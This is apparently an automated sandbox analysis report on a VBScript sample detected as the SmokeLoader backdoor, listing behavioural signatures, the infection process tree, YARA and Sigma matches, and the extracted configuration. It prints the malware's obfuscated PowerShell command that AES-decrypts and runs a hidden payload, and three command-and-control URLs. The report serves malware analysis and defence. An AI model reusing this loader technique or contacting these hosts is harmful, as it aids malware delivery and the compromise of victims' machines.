Windows Analysis Report
#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs
Overview
General Information
Field | Value |
---|---|
Sample name | #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs (renamed because original name is a hash value) |
Original sample name | -i .vbs |
Analysis ID | 1577216 |
MD5 | e6cba366210db05b0c86115900a17133 |
SHA1 | f3cc53aa5b7a037a8027d8d1703ab5c367687237 |
SHA256 | dada50182ca98f75e0055f9b4a47d8ef3a6dda5c126cac309467c02257f3c1c0 |
Detection
SmokeLoader

Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Downloads files with wrong headers with respect to MIME Content-Type
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 2680, cmdline: `C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs"`, MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 6640, cmdline: `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wfMpF($MmiD){return -split ($MmiD -replace '..', '0x$&')};$Ralma = wfMpF('<long hex ciphertext omitted>');$idRJO=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((wfMpF('4F6C6D774C5361495051654D7258624F')),[byte[]]::new(16)).TransformFinalBlock($Ralma,0,$Ralma.Length));& $idRJO.Substring(0,3) $idRJO.Substring(3)`, MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 1672, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Acrobat.exe (PID: 3872, cmdline: `"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\invoce2.pdf"`, MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
- AcroCEF.exe (PID: 6716, cmdline: `"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215`, MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- AcroCEF.exe (PID: 3620, cmdline: `"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1768,i,4178814619704218738,12566642219925520578,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8`, MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- putty.exe (PID: 4796, cmdline: `"C:\Users\user\AppData\Roaming\putty.exe"`, MD5: C09AA26230A2083DA9032866FD33703D)
- explorer.exe (PID: 1028, cmdline: `C:\Windows\Explorer.EXE`, MD5: 662F4F92FDE3557E86D110526BB578D5)
- svchost.exe (PID: 6768, cmdline: `C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS`, MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- ddhfdfu (PID: 7976, cmdline: `C:\Users\user\AppData\Roaming\ddhfdfu`, MD5: C09AA26230A2083DA9032866FD33703D)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
SmokeLoader | The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body. | | | |
{"Version": 2022, "C2 list": ["http://constractionscity1991.lat/", "http://restructurisationservice.ru/", "http://connecticutproperty.ru/"]}
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | |
| | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | |
| | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | |
| | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | |
| | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | |
| | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | |
| | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | |
| | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | |
| | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | |
System Summary

| Source | Author |
|---|---|
| | Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community |
| | frack113 |